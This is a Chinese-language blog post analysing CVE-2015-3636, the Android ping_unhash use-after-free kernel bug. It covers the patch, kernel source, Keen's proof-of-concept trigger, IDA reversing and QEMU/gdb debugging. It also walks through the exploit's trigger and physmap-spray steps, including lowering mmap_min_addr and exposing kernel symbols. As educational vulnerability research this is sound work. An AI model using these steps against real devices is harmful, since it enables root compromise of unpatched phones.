前言

去年差不多这个时候就计划把这个漏洞给分析了，由于android没有经常搞，所以踩了很多坑，中间一度因为各种原因停滞放弃，最近遇到一个事情让我下定决心把它了结，也算是解决一个心病。过程会写详细一点，给和我一样的初学朋友提供点帮助。这个漏洞keen在blackhat上讲过[8]，是一个很经典的android内核漏洞，也是第一个64bit root，还是很有学习价值的。分析android内核的漏洞需要自己下载android源代码和内核源代码，reverse patch，编译调试。吾爱破解有个比赛就是写这个漏洞的exploit，并且还提供了相应的环境[3]，所以我偷了个懒，直接拿过来用就行了。exploit我在github上也直接找了一份现成的[11]，经我测试可用。

漏洞原理

其实很多文章都对漏洞原理描述很清楚了，为了文章完整性我再赘述一下。补丁[12]是在net/ipv4/ping.c的ping_unhash中加了一句sk_nulls_node_init(&sk->sk_nulls_node)。

这行代码其实就是把node->pprev设置成了NULL。

static __inline__ void sk_nulls_node_init(struct hlist_nulls_node *node)

{

   node->pprev = NULL;

}

我们再看看keen给的POC。

int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);

struct sockaddr addr = { .sa_family = AF_INET };

int ret = connect(sockfd, &addr, sizeof(addr));

struct sockaddr _addr = { .sa_family = AF_UNSPEC };

ret = connect(sockfd, &_addr, sizeof(_addr));

ret = connect(sockfd, &_addr, sizeof(_addr));

把内核源代码下载下来看看。

git clone https://aosp.tuna.tsinghua.edu.cn/kernel/common.git

git checkout remotes/origin/android-3.4 -b android-3.4

当调用socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP)创建socket再调用connect时，在内核中调用到了inet_dgram_connect。

int inet_dgram_connect(struct socket *sock, struct sockaddr * uaddr,

              int addr_len, int flags)

{

   struct sock *sk = sock->sk;

   if (addr_len < sizeof(uaddr->sa_family))

       return -EINVAL;

   if (uaddr->sa_family == AF_UNSPEC)

       return sk->sk_prot->disconnect(sk, flags);

   if (!inet_sk(sk)->inet_num && inet_autobind(sk))

       return -EAGAIN;

   return sk->sk_prot->connect(sk, (struct sockaddr *)uaddr, addr_len);

}

EXPORT_SYMBOL(inet_dgram_connect);

如果sa_family == AF_UNSPEC会根据协议类型调用相应的disconnect routine，对于PROTO_ICMP来说是udp_disconnect。

int udp_disconnect(struct sock *sk, int flags)

{

   struct inet_sock *inet = inet_sk(sk);

   /*

    * 1003.1g - break association.

    */

   sk->sk_state = TCP_CLOSE;

   inet->inet_daddr = 0;

   inet->inet_dport = 0;

   sock_rps_reset_rxhash(sk);

   sk->sk_bound_dev_if = 0;

   if (!(sk->sk_userlocks & SOCK_BINDADDR_LOCK))

       inet_reset_saddr(sk);

   if (!(sk->sk_userlocks & SOCK_BINDPORT_LOCK)) {

       sk->sk_prot->unhash(sk);

       inet->inet_sport = 0;

   }

   sk_dst_reset(sk);

   return 0;

}

EXPORT_SYMBOL(udp_disconnect);

最终会调用到ping_unhash。

void ping_unhash(struct sock *sk)

{

   struct inet_sock *isk = inet_sk(sk);

   pr_debug("ping_unhash(isk=%p,isk->num=%u)\n", isk, isk->inet_num);

   if (sk_hashed(sk)) {

       write_lock_bh(&ping_table.lock);

       hlist_nulls_del(&sk->sk_nulls_node);

       sk_nulls_node_init(&sk->sk_nulls_node);

       sock_put(sk);

       isk->inet_num = 0;

       isk->inet_sport = 0;

       sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);

       write_unlock_bh(&ping_table.lock);

   }

}

EXPORT_SYMBOL_GPL(ping_unhash);

如果sk_hashed条件成立则会调用hlist_nulls_del在一个双向链表hlist中删除sk_nulls_node。

static inline void __hlist_nulls_del(struct hlist_nulls_node *n)

{

        struct hlist_nulls_node *next = n->next;

        struct hlist_nulls_node **pprev = n->pprev;

        *pprev = next;

        if (!is_a_nulls(next))

                  next->pprev = pprev;

}

static inline void hlist_nulls_del(struct hlist_nulls_node *n)

{

        __hlist_nulls_del(n);

        n->pprev = LIST_POISON2;

}

当n也就是sk_nulls_node被删除之后n->pprev被设置为LIST_POISON2，它的值是固定的0x200200。我们看一下第二次connect的时候sk_hashed条件是否成立。

static inline int sk_unhashed(const struct sock *sk)

{

        return hlist_unhashed(&sk->sk_node);

}

static inline int sk_hashed(const struct sock *sk)

{

        return !sk_unhashed(sk);

}

static inline int hlist_unhashed(const struct hlist_node *h)

{

        return !h->pprev;

}

这里注意sk_node和sk_nulls_node共用了一个union，两者的定义也十分类似，似乎有一点类型混淆的感觉。

#define sk_node            __sk_common.skc_node

#define sk_nulls_node      __sk_common.skc_nulls_node

   union {

       struct hlist_node  skc_node;

       struct hlist_nulls_node skc_nulls_node;

   };

struct hlist_node {

   struct hlist_node *next, **pprev;

};

struct hlist_nulls_node {

   struct hlist_nulls_node *next, **pprev;

};

所以虽然设置的是sk_nulls_node->pprev判断的是sk_node->pprev但是实际上是一个东西，sk_hashed条件成立，再次删除已经删除的对象，执行*pprev = next时pprev已经是0x200200了，如果这个地址没有映射到用户态就会kernel panic。poc中第一次AF_INET的connect是为了将sk加入hlist中。下面就是poc的效果。

这里Unable to handle kernel paging request at virtual address的地址是0x1360而不是0x200200，可能出题的人在这里修改了一下。我们在IDA里面看看。如果采取自己编译调试的方式是可以加载vmlinux符号文件的，这里我们就只能自己从机器上得到函数地址和名称然后加载到IDA中了。把Image拖到IDA64中，Process type选择ARM Little-endian [ARM]。

把ROM start address和Loading address设置为0xFFFFFFC000080000(32位系统就是0xC0008000)。Android 8.0中才为4.4及以后的内核引入了KASLR，很显然我们这里没有KASLR，这个值是固定的。

选择64-bit code。

这个时候IDA是什么也识别不出来的，因为Image文件并不是一个ELF，用binwalk看一下就会发现其实它组成还挺复杂的。我们接下来从运行的虚拟机中导出内核函数名称和地址。在ubuntu这样的发行版和android内核中有Kernel Address Display Restriction，所以先把它关掉。

sh -c " echo 0 > /proc/sys/kernel/kptr_restrict"

cat /proc/kallsyms > /data/local/tmp/1.txt

adb pull /data/local/tmp/1.txt

写一个简单的脚本把这些函数名加载到IDA里面。

ksyms = open("D:\\1.txt")

for line in ksyms:

   addr = int(line[0:16],16)

   name = line[19:].replace('_','')

   name = line[19:].replace('\n','')

   idc.MakeCode(addr)

   idc.MakeFunction(addr)

   idc.MakeName(addr,name)

   Message("%08X:%s"%(addr,name))

出来的函数列表里面只有ping_hash没有ping_unhash，我们把ping_hash的End address改成0xFFFFFFC000409614再在0xFFFFFFC000409614处create function处理一下就可以了。

我们可以看到crash处0xFFFFFFC000409644和前后的代码。

ROM:FFFFFFC00040963C                 LDR             X1, [X19,#0x38]

ROM:FFFFFFC000409640                 LDR             X0, [X19,#0x30]

ROM:FFFFFFC000409644                 STR             X0, [X1]

这三行代码对应源代码中的下面这三行。

struct hlist_nulls_node *next = n->next;

struct hlist_nulls_node **pprev = n->pprev;

*pprev = next;

所以进一步确认了漏洞成因和我们前面所分析的一样。如何让IDA分析Image讲的有点多了，主要参考了[1]和[4]。接下来还是回到正题，既然说这是一个UAF漏洞那么哪里UAF了呢？在hlist_nulls_del之后还有一个sock_put。

/* Ungrab socket and destroy it, if it was the last reference. */

static inline void sock_put(struct sock *sk)

{

   if (atomic_dec_and_test(&sk->sk_refcnt))

       sk_free(sk);

}

sock_put将sk的引用计数减1，并且判断其值是否为0，如果为0的话就free掉sk。可以想到最后一次connect进入本不该进入的if分支之后如果我们提前mmap了0x200200(这里是0x1360)就不会崩溃，接下来进入sock_put，引用计数变成0，sk被free掉，但是文件描述符还在用户空间，这就造成了UAF。

调试过程

我们可以先测一下这个EXP。不过要注意的是必须用adb shell过去然后su shell才能继承root的权限得到建立socket的权限。测试发现这个EXP确实是可用的，下面就开始调试。

我调试时的命令如下。

./qemu-system-aarch64 -cpu cortex-a57 -machine type=ranchu -m 1024 -append 'console=ttyAMA0,38400 keep_bootcon earlyprintk=ttyAMA0' -serial mon:stdio -kernel Image -initrd /home/hjy/Desktop/android-problem-env/ramdisk.img -drive index=0,id=sdcard,file=/home/hjy/Desktop/android-problem-env/system.img -device virtio-blk-device,drive=sdcard -drive index=1,id=userdata,file=/home/hjy/Desktop/android-problem-env/.//userdata.img -device virtio-blk-device,drive=userdata -drive index=2,id=cache,file=/home/hjy/Desktop/android-problem-env/cache.img -device virtio-blk-device,drive=cache -drive index=3,id=system,file=/home/hjy/Desktop/android-problem-env/system.img -device virtio-blk-device,drive=system -netdev user,id=mynet -device virtio-net-device,netdev=mynet -show-cursor -nographic -L lib/pc-bios -gdb tcp::1234,ipv4 –S

这里又有一个很坑的地方，用NDK里面的gdb去调试会报Remote 'g' packet reply is too long，需要我们自己修改gdb源代码并且编译[9]。

git clone https://android.googlesource.com/toolchain/gdb.git

下载下来发现有gdb-7.11和gdb-8.0.1两个文件夹，由于pwndbg和GEF等插件目前好像还不支持gdb 8.x，所以我们选择gdb-7.11。找到gdb-7.11/gdb目录下的remote.c文件，注释掉这两行。

if (buf_len > 2 * rsa->sizeof_g_packet)

    error (_(“Remote ‘g’ packet reply is too long: %s”), rs->buf);

在后面加上下面这几行。

if (buf_len > 2 * rsa->sizeof_g_packet)

  {

     rsa->sizeof_g_packet = buf_len ;

     for (i = 0; i < gdbarch_num_regs (gdbarch); i++)

     {

        if (rsa->regs[i].pnum == -1)

        continue;

        if (rsa->regs[i].offset >= rsa->sizeof_g_packet)

        rsa->regs[i].in_g_packet = 0;

        else

        rsa->regs[i].in_g_packet = 1;

     }

  }

编译安装。

./configure --target=aarch64-linux-androideabi --prefix=/home/hjy/Desktop/gdb_build/gdb/gdb-7.11/arm-linux

make

make install

安装GEF，因为很多人说pwndbg比较卡而GEF不卡。

wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh

终于开始调试了，不过还有一个小坑，我们应该用gef-remote -q localhost:1234也就是加上-q参数不然会报错，原因在这里[7]。接下来进入漏洞利用的部分。我们可以看到在main函数中整个漏洞触发漏洞的过程和POC中一样。

vultrig_socks[i] = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);

ret = connect(vultrig_socks[i], &addr1, sizeof(addr1));

system("echo 4096 > /proc/sys/vm/mmap_min_addr");

void* user_mm = mmap(PAGE_SIZE, MAX_NULLMAP_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE| MAP_FIXED |MAP_ANONYMOUS, -1, 0);

ret = connect(vultrig_socks[i], &addr2, sizeof(addr2));

ret = connect(vultrig_socks[i], &addr2, sizeof(addr2));

修改mmap_min_addr并mmap就是为了避免崩溃这样才能执行到sock_put的逻辑。接下来的操作叫做physmap spray，大家如果对CVE-2014-3153(towelroot)还有印象的话，会记得它是通过sendmmsg修改内核数据的，keen在文章中解释了，通过sendmmsg完成堆喷的条件是存在漏洞的对象大小必须和SLAB分配器通常使用的大小一致。而在一些android设备上，PING sock对象的大小是576，不是期望的512或者1024。这样就很难对齐，利用会很不稳定，所以采用的是physmap spray的方法。

在内核中physmap在一个相对较高的地址，而SLAB通常在一个相对较低的地址，通过喷射其它的内核对象使得SLAB分配器在相对高的地址分配PING sock对象造成physmap和SLAB重叠，这个过程叫做lifting。这里的“其它的内核对象”直接用PING sock对象其实就可以。

然后释放掉用来做lifting的PING sock对象，和physmap重叠的那一部分则留做触发漏洞。那么怎样才能知道什么时候PING sock对象已经被physmap中的数据填充了可以停止喷射以及怎样找到已经被填充的PING sock对象呢？在physmap spray中进行了大量的mmap操作，并且将mapped_page+0x1D8处赋值为MAGIC_VALUE+physmap_spray_pages_count，接下来search_exploitable_socket的时候用ioctl一个一个去试。

ioctl(exp_sock, SIOCGSTAMPNS, &time);

这里的time是timespec结构体，会调用到sock_get_timestampns。

int sock_get_timestampns(struct sock *sk, struct timespec __user *userstamp)

{

   struct timespec ts;

   if (!sock_flag(sk, SOCK_TIMESTAMP))

       sock_enable_timestamp(sk, SOCK_TIMESTAMP);

   ts = ktime_to_timespec(sk->sk_stamp);

   if (ts.tv_sec == -1)

       return -ENOENT;

   if (ts.tv_sec == 0) {

       sk->sk_stamp = ktime_get_real();

       ts = ktime_to_timespec(sk->sk_stamp);

   }

   return copy_to_user(userstamp, &ts, sizeof(ts)) ? -EFAULT : 0;

}

作者：看雪学院
链接：https://www.jianshu.com/p/281ef45acf33